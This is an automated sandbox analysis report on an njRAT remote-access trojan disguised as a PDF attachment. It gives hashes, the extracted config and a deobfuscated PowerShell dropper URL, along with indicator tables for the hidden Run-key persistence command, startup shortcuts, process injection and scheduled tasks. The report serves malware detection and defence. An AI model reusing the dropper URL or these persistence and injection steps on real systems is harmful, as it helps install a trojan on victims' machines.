njrat | aacbab5ac2400711c5fe4ce86ffe1e89627029325257ba8d81332d3dc2f81691

Analysis

max time kernel
139s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2025, 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

attach.pdf/EncriptadoOOKK50.vbs
Size

8.5MB
MD5

fe73937416b78fff5aabab8506b32f60
SHA1

c87bb9695995735f37b46d10db49c0e75deaa26d
SHA256

a937e59c4e8f66f9c60c5725fa85bbd71e3a8fc32ade529ec7620ed81dd1126e
SHA512

231cdeed56ff52c687aba8ae417232402d09535256f68c964e4f503d0b9fb806fbc909dc6afb82f492c29887d74df9676f03913600024d5a8856737d5304e9c2
SSDEEP

768:lm+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m+m++:Q7kwA6P

Score

10^/10

njrat nyan cat defense_evasion discovery execution persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

exe.dropper

https://textbin.net/raw/ezjmofz3s6

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

exe.dropper

https://textbin.net/raw/ezjmofz3s6

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

127.0.0.1:6900

Mutex

fd048b4fe5

Attributes

reg_key
fd048b4fe5
splitter
@!#&^%$

Signatures

Njrat family
njrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 64 IoCs

flow	pid	Process
9	5132	powershell.exe
20	5132	powershell.exe
29	4132	powershell.exe
30	4132	powershell.exe
31	5220	powershell.exe
32	5220	powershell.exe
37	2296	powershell.exe
38	2296	powershell.exe
39	1308	powershell.exe
40	1308	powershell.exe
42	3092	powershell.exe
43	1460	powershell.exe
44	1460	powershell.exe
45	5020	powershell.exe
47	3092	powershell.exe
48	5020	powershell.exe
49	2208	powershell.exe
50	2208	powershell.exe
51	2916	powershell.exe
53	2916	powershell.exe
54	4828	powershell.exe
57	4828	powershell.exe
64	4844	powershell.exe
65	4844	powershell.exe
69	1392	powershell.exe
70	1392	powershell.exe
77	440	powershell.exe
80	1228	powershell.exe
85	440	powershell.exe
87	1228	powershell.exe
89	4076	powershell.exe
90	4076	powershell.exe
91	5440	powershell.exe
92	5440	powershell.exe
94	212	powershell.exe
95	212	powershell.exe
96	5920	powershell.exe
98	5920	powershell.exe
99	2292	powershell.exe
100	2292	powershell.exe
101	2600	powershell.exe
102	2600	powershell.exe
104	4572	powershell.exe
105	4572	powershell.exe
106	1392	powershell.exe
110	1392	powershell.exe
112	4908	powershell.exe
113	4908	powershell.exe
116	2544	powershell.exe
117	2544	powershell.exe
118	3000	powershell.exe
119	3000	powershell.exe
120	3852	powershell.exe
121	3852	powershell.exe
123	5808	powershell.exe
124	5808	powershell.exe
125	1456	powershell.exe
126	1456	powershell.exe
128	5684	powershell.exe
129	5684	powershell.exe
130	4624	powershell.exe
131	4624	powershell.exe
133	856	powershell.exe
134	856	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2496	powershell.exe
1808	powershell.exe
2236	powershell.exe
4584	powershell.exe
3912	powershell.exe
5880	powershell.exe
1456	powershell.exe
5732	powershell.exe
3840	powershell.exe
1968	powershell.exe
4972	powershell.exe
320	powershell.exe
6096	powershell.exe
4568	powershell.exe
4624	powershell.exe
552	powershell.exe
6044	powershell.exe
3692	powershell.exe
3120	powershell.exe
5440	powershell.exe
2220	powershell.exe
4912	powershell.exe
1960	powershell.exe
2136	powershell.exe
1228	powershell.exe
3156	powershell.exe
2100	powershell.exe
3520	powershell.exe
2852	powershell.exe
1392	powershell.exe
5708	powershell.exe
5268	powershell.exe
4868	powershell.exe
2068	powershell.exe
3656	powershell.exe
5048	powershell.exe
5592	powershell.exe
4976	powershell.exe
2208	powershell.exe
1392	powershell.exe
5296	powershell.exe
3912	powershell.exe
1948	powershell.exe
1460	powershell.exe
3128	powershell.exe
5404	powershell.exe
5360	powershell.exe
5296	powershell.exe
5132	powershell.exe
5220	powershell.exe
4156	powershell.exe
3080	powershell.exe
2180	powershell.exe
1412	powershell.exe
3352	powershell.exe
1656	powershell.exe
916	powershell.exe
6092	powershell.exe
1308	powershell.exe
3644	powershell.exe
2916	powershell.exe
2600	powershell.exe
2456	powershell.exe
3176	powershell.exe

Checks computer location settings 2 TTPs 55 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 28 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe

Adds Run key to start application 2 TTPs 27 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 29 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
5964	cmd.exe
2236	cmd.exe
6048	cmd.exe
5408	cmd.exe
3320	cmd.exe
6048	cmd.exe
2296	cmd.exe
3424	cmd.exe
3748	cmd.exe
5484	cmd.exe
852	cmd.exe
1760	cmd.exe
6112	cmd.exe
2416	cmd.exe
6132	cmd.exe
5192	cmd.exe
1148	cmd.exe
2196	cmd.exe
3852	cmd.exe
3128	cmd.exe
3120	cmd.exe
3644	cmd.exe
6080	cmd.exe
2692	cmd.exe
2624	cmd.exe
5600	cmd.exe
3960	cmd.exe
3368	cmd.exe
5812	cmd.exe

Suspicious use of SetThreadContext 27 IoCs

description	pid	Process	procid_target
PID 4132 set thread context of 2596	4132	powershell.exe	121
PID 2296 set thread context of 208	2296	powershell.exe	143
PID 3092 set thread context of 1392	3092	powershell.exe	182
PID 5020 set thread context of 2668	5020	powershell.exe	183
PID 2916 set thread context of 4680	2916	powershell.exe	204
PID 4844 set thread context of 1104	4844	powershell.exe	226
PID 440 set thread context of 1208	440	powershell.exe	253
PID 4076 set thread context of 4640	4076	powershell.exe	273
PID 212 set thread context of 2820	212	powershell.exe	294
PID 2292 set thread context of 2200	2292	powershell.exe	314
PID 4572 set thread context of 2460	4572	powershell.exe	339
PID 4908 set thread context of 4980	4908	powershell.exe	354
PID 3000 set thread context of 3688	3000	powershell.exe	374
PID 5808 set thread context of 5916	5808	powershell.exe	395
PID 5684 set thread context of 2688	5684	powershell.exe	416
PID 856 set thread context of 3064	856	powershell.exe	437
PID 3080 set thread context of 5384	3080	powershell.exe	457
PID 5228 set thread context of 3832	5228	powershell.exe	477
PID 2732 set thread context of 4624	2732	powershell.exe	499
PID 4136 set thread context of 4388	4136	powershell.exe	520
PID 4560 set thread context of 1876	4560	powershell.exe	540
PID 3852 set thread context of 3832	3852	powershell.exe	560
PID 2600 set thread context of 6048	2600	powershell.exe	580
PID 1600 set thread context of 5320	1600	powershell.exe	601
PID 2216 set thread context of 3572	2216	powershell.exe	621
PID 3120 set thread context of 5976	3120	powershell.exe	641
PID 1188 set thread context of 4796	1188	powershell.exe	661

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 29 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4868	schtasks.exe
4904	schtasks.exe
4484	schtasks.exe
5840	schtasks.exe
3540	schtasks.exe
2156	schtasks.exe
776	schtasks.exe
3540	schtasks.exe
5340	schtasks.exe
3212	schtasks.exe
